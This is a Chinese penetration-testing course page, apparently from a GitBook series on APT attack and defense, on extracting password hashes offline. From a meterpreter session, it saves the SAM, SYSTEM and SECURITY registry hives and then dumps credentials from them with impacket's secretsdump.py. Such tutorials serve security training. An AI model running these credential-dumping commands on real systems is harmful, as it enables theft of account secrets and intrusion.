Micro8
专注APT攻击与防御
Search…
前言
Preface
目录
第一章:生
1-10课
11-20课
21-30课
31-40课
41-50课
51-60课
第五十一课:项目回忆:体系的本质是知识点串联
第五十二课:渗透的本质是信息搜集
第五十三课:内网渗透中的文件传输
第五十四课:基于Powershell做Socks 4-5代理
第五十五课:与Smbmap结合攻击
第五十六课:离线提取目标机hash
第五十七课:高级持续渗透-第一季关于后门
第五十八课:高级持续渗透-第二季关于后门补充一
第五十九课:高级持续渗透-第三季关于后门补充二
第六十课:高级持续渗透-第四季关于后门
61-70课
71-80课
81-90课
91-100课
第二章:老(待更新...)
第三章:病(待更新...)
Powered By
GitBook
第五十六课:离线提取目标机hash
很多环境下,不允许上传或者使用 mimikatz。而针对非域控的单机离线提取 hash 显得尤为重要。
在 meterpreter shell 命令切到交互式 cmd 命令。
reg save 方式使得需要下载的目标机hash文件更小。
reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv
meterpreter下自带download功能。
离线提取:
本季用到的是 impacket 的 secretsdump.py。Kali默认路径:
/root/impacket/examples/secretsdump.py
命令如下:
1
[email protected]
:/tmp
# python /root/impacket/examples/secretsdump.py ‐sam sam.hiv ‐security security.hiv ‐system sys.hiv LOCAL
Copied!
Micropoor
Previous
第五十五课:与Smbmap结合攻击
Next
第五十七课:高级持续渗透-第一季关于后门
Last modified
3yr ago
Copy link
Contents
离线提取: